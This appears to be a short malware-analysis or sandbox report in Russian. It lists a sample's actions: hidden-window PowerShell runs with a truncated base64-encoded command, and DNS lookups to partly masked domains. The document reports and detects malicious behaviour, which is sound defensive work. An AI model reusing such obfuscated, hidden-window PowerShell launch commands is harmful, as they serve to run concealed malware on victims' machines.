Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABCAHcAYQBpAHoAZABnAGsAeQBoAD0AJwBCAHYAawB3AG4AcABmAHQAdwBrAGMAcwBjACcAOwAkAEYAcwBvAHQAbgBoAHYAcgBvAG...
- DNS ASK se###uyen.com
- DNS ASK mo#####acebookvn.com
- DNS ASK wa##sky.com
- DNS ASK wi#####d.wpmudev.host
- DNS ASK pl###heme.ir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABCAHcAYQBpAHoAZABnAGsAeQBoAD0AJwBCAHYAawB3AG4AcABmAHQAdwBrAGMAcwBjACcAOwAkAEYAcwBvAHQAbgBoAHYAcgBvAG...' (со скрытым окном)